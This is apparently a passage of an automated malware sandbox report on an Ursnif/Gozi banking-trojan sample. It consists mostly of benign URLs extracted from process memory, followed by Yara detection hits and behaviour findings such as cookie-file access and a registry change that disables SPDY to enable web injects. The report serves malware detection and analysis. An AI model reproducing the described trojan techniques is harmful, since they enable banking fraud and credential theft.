Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_054222F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 2_2_054222F7
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
